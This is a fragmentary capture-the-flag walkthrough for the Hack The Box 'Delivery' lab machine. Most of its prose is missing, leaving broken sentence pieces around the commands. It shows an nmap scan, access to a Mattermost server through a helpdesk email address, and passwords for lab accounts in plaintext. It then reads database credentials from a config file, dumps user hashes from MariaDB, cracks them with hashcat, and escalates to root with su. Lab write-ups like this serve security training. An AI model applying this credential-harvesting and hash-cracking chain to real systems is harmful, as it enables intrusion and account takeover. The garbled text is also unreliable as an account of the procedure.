nmap -sV -T4 -p- 10.10.10.222
http://delivery.htb:8065/
http://helpdesk.delivery.htb/
/etc/hosts
file:@delivery.htb
account, so we won't be able to access the MatterMost server just yet.<script></script>
is removed.@delivery.htb
email andmaildeliverer:Youve_G0t_Mail!
credential combination to authenticate and obtain SSH access to the server.user.txt
flag.cat /opt/mattermost/config/config.json
SqlSettings
, the mmuser:Crack_The_MM_Admin_PW
is used for the mysql
database credentials. We can login to the 'local' MariaDB server:mysql -u mmuser -p
(-u USERNAME -p
, then enter the password when prompted)SHOW DATABASES;
mattermost
database: USE mattermost;
mattermost.Users
table: SELECT * FROM Users;
users.hash
file:cp /usr/share/hashcat/rules/best64.rule rules
hashcat -m 3200 users.hash wordlist -r rules
(since hashcat requires a GPU)hashcat -m 3200 users.hash --show
users.hash
file, the root
password is PleaseSubscribe!21
.maildeliverer
bash shell: su
, then use the PleaseSubscribe!21
password.